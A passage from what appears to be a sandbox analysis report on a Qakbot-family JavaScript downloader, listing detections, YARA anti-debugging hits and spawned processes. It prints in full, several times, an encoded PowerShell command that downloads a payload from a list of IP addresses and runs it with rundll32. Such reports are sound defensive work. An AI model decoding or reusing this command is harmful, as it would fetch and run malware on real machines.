AQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA==" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 26, 2023, 10:20 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

MicroWorld-eScan	JS:Trojan.Cryxos.12541
FireEye	JS:Trojan.Cryxos.12541
ALYac	JS:Trojan.Cryxos.12541
Arcabit	JS:Trojan.Cryxos.D30FD
Symantec	Scr.Malcode!gen53
ESET-NOD32	JS/Agent.QTW
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Qbot.gen
BitDefender	JS:Trojan.Cryxos.12541
Emsisoft	JS:Trojan.Cryxos.12541 (B)
VIPRE	JS:Trojan.Cryxos.12541
MAX	malware (ai score=85)
Microsoft	Trojan:JS/Qakbot.SM!MTB
GData	JS:Trojan.Cryxos.12541
Google	Detected
Ikarus	Trojan-Downloader.JS.Agent
Fortinet	JS/Agent.QAK!tr
AVG	Other:Malware-gen [Trj]

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
parent_process	wscript.exe	martian_process	powershell -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy

